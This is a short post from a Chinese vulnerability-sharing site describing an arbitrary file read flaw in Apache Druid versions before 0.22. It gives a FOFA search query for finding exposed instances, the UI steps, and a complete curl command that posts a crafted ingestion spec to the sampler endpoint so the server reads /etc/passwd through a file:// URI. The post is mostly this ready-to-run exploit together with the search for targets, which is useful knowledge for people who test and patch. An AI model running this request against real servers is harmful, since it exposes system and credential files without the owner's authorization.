标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3079] 作者: 小螺号 发表于: [2022-04-18] [2022-04-18]被用户:小螺号 修改过
本文共 [429] 位读者顶过
Apache Druid LoadData 任意文件读取漏洞漏洞原理由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。[出自:jiwo.org]影响版本1.| Apache Druid Version < 0.22fofa语法1.| title="Apache Druid"漏洞测试主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读取)
1.| file:///bin/ 1.| file:///etc/passwd 命令行方式curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 |